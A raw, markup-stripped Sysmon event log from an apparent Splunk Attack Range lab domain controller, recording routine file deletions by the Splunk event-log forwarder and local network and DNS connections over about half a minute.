354300x80000000000000002201823Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:19.084{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60580-false10.0.1.12-8000- 23542300x80000000000000002201822Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:23.216{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AF2365AFB06FFC4F6A50E296A72EFF0,SHA256=B63CABC786673C663DED038E97A22807F64855B87E99CCC61FCD094269382FA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201827Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:24.841{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8791DA41A311F6D82070FA04EFF34105,SHA256=7D0FE57938503EB688D77F217869969F0DACCB2B292352A2BCBA7BEE6EF9DF01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201826Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:24.670{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=9AA323EF3D52AB156BD65D8434CB9E3B,SHA256=8A7F1F4F8D3F4BEEE8B8ACCC09E9A686D94AED926A7F191F7E958CD527C7BB93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201825Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:24.670{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=77D98A18BA10B5C46EE0D911D3AA8FBD,SHA256=C38D18FFEA7882760A5C34AD9D32D2D347477E67F986CEC5EB05F71F22F98C25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201824Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:24.216{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46E169C6D956B06691989AAB32F6B003,SHA256=1C6E3A7CA864A910F85C3B01DC56F2B995FD37DD55C478F317768BD2D0DEC823,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201829Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:21.443{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local56501- 23542300x80000000000000002201828Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:25.279{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B29F102445532796E077FAFBAE7838D,SHA256=DA6C0323F584C3EDB744D89F3CE3090DF950BAB5F6EA5D508D81585D4098E73F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201830Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:26.310{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40C29D44A2E5AF2D2E0AA8A0D8990DBC,SHA256=C3483ABA04DCE2AACFC23A55121BACA880C1A6FE61F2FDB8C171EB8EBC206DE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201831Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:27.341{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AFDD0681E2168B842EC1990DC4260D8,SHA256=296C3FC771E426E633C7911F6CAD514CDCD69D3644939BBD8676A9B4E9B037E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201833Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:28.529{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BCF9CF6E90425E9ED35E8E3C108372B,SHA256=97D2C2BED2BBA45E7F984FAB371151BD1D9B7DB3F51B9EF72A9A67D678E7F67F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201832Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:28.232{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE925AF9B57D0EA005F165D55B7973BC,SHA256=6E6D70F4904EB3EF4802EF55D8FC95C117EEBE1AB7FA89C52626CB64A9DC4A0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201835Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:24.912{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60581-false10.0.1.12-8000- 23542300x80000000000000002201834Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:29.560{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBFD7515EBA4827030CB3612C189CFE0,SHA256=30434581C09270542034D21646EE497151E9C4B599C769563473CD2240E1AA29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201836Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:30.576{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA6611DDAA8797F97C323FD255779F12,SHA256=A436361E15A867B9B6E4D5402263FBD8D1B063DF805E2DF735285A394CD2D650,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201837Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:31.577{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B909B6D63755AE5B65D83F03C13C7BA4,SHA256=BC1C0CFD5F63092B2D7D3748D284CFEF7E8183AEACD3CC257B1F64A3485FFF63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201838Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:32.593{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A8B2E26DDFDEBC8B7848B30BFE969E2,SHA256=BA9C259BAE48F2A43D696F3839E62666E45C429FFD666093A2D784A1DBB74178,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201840Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:33.608{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F93FFFF22973EDB45383FF49CA6C222,SHA256=CBF55886404DF5BADB5965A50103D00A03E08C8086948D378E83BD7938134BDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201839Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:33.046{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=813168D51322AD4A520E82EFD19CC5D5,SHA256=9039B7D106E23D8A876E31E48C5B4DC99345576AF06D2595F8AB680D237DA8C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201843Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:34.624{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F64DA3B8A2308C00AF05FE6DBC12C64,SHA256=A1935AA5B760B98868C7C9A6D004DCC8E00B2AC853B7116122BEE613A89C4C43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201842Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:34.608{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F40276D3E9F08112CBAE9DEEC9C0532C,SHA256=ED27B731DAA2E040E78492E84D4B8A1EE1DCD1578F3BF8097E86752C2016102B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201841Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:29.960{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60583-false10.0.1.12-8000- 23542300x80000000000000002201846Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:35.640{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F0BD4FBB6751D8AC54678A6662F70CC,SHA256=FF12247E522878AB6AF0CEBB903F84A061C24B56DEC44E8C39943E7934C00E24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201845Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:35.624{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82611D0F96EACA6DF74D51D90B3FD9B3,SHA256=11B2819F8996B511A396E58337F1D87E726D460E50878D35AAEC4E0163C38687,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201844Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:31.444{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local58826- 23542300x80000000000000002201848Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:36.686{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB1B41101465DF3646C8FF9CEF4DD348,SHA256=64B4DBD8075AC3702349DFAADB0C1CD6794DE5F9B6D3658B70393895E7DD9613,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201847Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:32.444{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-58826- 23542300x80000000000000002201849Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:37.702{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=014C40E1E7475107DC4ADEC5E702405F,SHA256=BA2F04B5A98796FAC034890061258B9C8028400BACE21C9236BDB77777C399BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201851Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:38.718{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3CB09464BE3A0CC14F984F0BEAFAD79,SHA256=2973DE1005FB8B8EF4EFDC73B06047968DEE4994BB4848C0E39705F088A63448,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201850Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:38.233{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1094D91720F5970DD0C8A79468DE4EFD,SHA256=FDCE2AFA64170C23EE0E39B0284C4FDEE4D1322F7C25E128C32686523F893231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201852Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:39.733{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35A2C7FA559B1D096BCC4FBA4D628972,SHA256=1B25189E0EA84061C3F5061D104DF88B7912BB8BFE583773CE08B2BA6E1566F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201854Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:40.733{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A88AB389746DAC8F3FD9E85C27DA596A,SHA256=619E3DBAFDB1EB9643B7A17261CE211F87FEC50C15C0E088294E1AA6EE93D25B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201853Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:35.038{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60584-false10.0.1.12-8000- 23542300x80000000000000002201855Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:41.733{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3135D15564A1AD13696CB239EF23BF81,SHA256=583A80A8337D3D415940D816BE7B3DF92026B17145E3D79137E6A425A3BB7F77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201857Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:42.749{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B859F7975954E315A2BE6F9DE8986FAF,SHA256=8A76348A13823C5E1956B6DAD126EFF8286DD7021C83776B523CE0841969AF7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201856Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:42.749{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=324C1A8A8DFA0486BAABCE1ED8562F30,SHA256=3CFEB39AF623275AD8900CB1EE770C3E28DFDE3C786FFB0BB293851428DDA323,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201860Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:43.764{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EE2BA5B24F8700D1EA5DF3B69C1EAE5,SHA256=DA0B84D22525F33A188D9DE256782F8C9CEF67152A935ED25CAD64B088DEC98A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201859Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:39.502{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-51172-true2001:503:c27:0:0:0:2:30j.root-servers.net53domain 354300x80000000000000002201858Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:39.491{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local58826-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domain 23542300x80000000000000002201862Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:44.764{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77035F9627BB205C5BEFD5A066173622,SHA256=9A220FBF74302A93C227FE36C9CE314A79E12921ADFB24309FB0A0C72DA29C56,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201861Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:40.054{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60585-false10.0.1.12-8000- 23542300x80000000000000002201863Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:45.780{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDD996D19F89391BF4D196793A89A5BC,SHA256=7F71EEB39E7D436B65EE6146D4A76980863B1494DC57F07665BFFE56E20990D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201864Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:46.796{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DDED59F868335C0B0A311D3F8E7ADB8,SHA256=1F99DB899461767F58E2EA63E707247372989989F7E8C404FC126937A2AE075E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201865Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:47.796{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1B17B9653382DA81BA6A8D1CAD53370,SHA256=94D7ADF1D3B91CB72EFCA4F7AA1CF8E48774D709E6A77289B28FACB4F0DD4724,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201866Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:48.811{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED73243B241F3DA3B77DB10E6F21CFF,SHA256=1A97941F537E63A4A5731F22F34BB0A83ADBC454896AA4AF696AEBC2954FABDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201870Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:49.827{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7D3FAB0AA3E276E394AD60E31244783,SHA256=BAB6258B0E54704D01A9D521B27A74A08EDCC48DD5D1A6E2053B57E5B105824A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201869Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:45.898{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60586-false10.0.1.12-8000- 23542300x80000000000000002201868Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:49.108{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A7C1799EA4CB06B1024E9F694F489E0,SHA256=AB9FB73AE16D10C2D06F8CA3C3EFA9EB21F8E921AED90D386D8724ECDC095D9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201867Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:49.108{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A66E42A1B43D7D598CD19A7139664E57,SHA256=BA1D1686ECA1B6C988683675528395AA91FDE900A6B50AEA95E0DB8C476313D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201871Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:50.843{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74192D6914514F33C96063278FE27773,SHA256=21190BBC522076B2EE6A825E79225BC22B4024C2C58A2742A1DAE9A767401D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201872Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:51.843{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2309353A425B3A097666DE0A0ECFB54,SHA256=6DC5CF033BA0F1E1558D7C4EFDCD9B4CBAA473A199FEEAE680C92D2B2EDCB006,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201873Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:52.858{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E15ED39389A42D7038AC3E7A14F2578,SHA256=6FB910DF86E3ABFCDCE80694703C80AEC7A410F62205EA55CA719C5F5029286D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201876Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:53.858{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59ECC2E12AAB58FD4440E7E39A1593C7,SHA256=33D73BCE8CA1532BF95358DF6FBEB15CCA4292A15980CDB861BE5D80C9AF3553,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201875Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:50.194{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60056- 